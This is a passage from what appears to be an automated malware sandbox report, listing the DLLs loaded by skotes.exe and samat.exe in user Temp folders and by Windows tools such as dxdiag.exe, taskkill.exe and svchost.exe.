                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: python3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: libffi-8.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: libcrypto-3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: libssl-3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: pywintypes313.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dxdiagn.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: devobj.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winmmbase.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wmiclnt.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dsound.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: devrtl.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: spinf.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: drvstore.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: spfileq.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wifidisplay.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mmdevapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mfplat.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: rtworkq.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mf.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mfcore.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: ksuser.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mfsensorgroup.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: comppkgsup.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.media.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.applicationmodel.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dispbroker.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12core.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dxilconv.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3dscache.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: mscat32.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: ddraw.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dciman32.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: avrt.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: audioses.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: msacm32.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: midimap.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dinput8.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: hid.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: inputhost.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: devenum.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: msdmo.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: quartz.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dll
                    Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
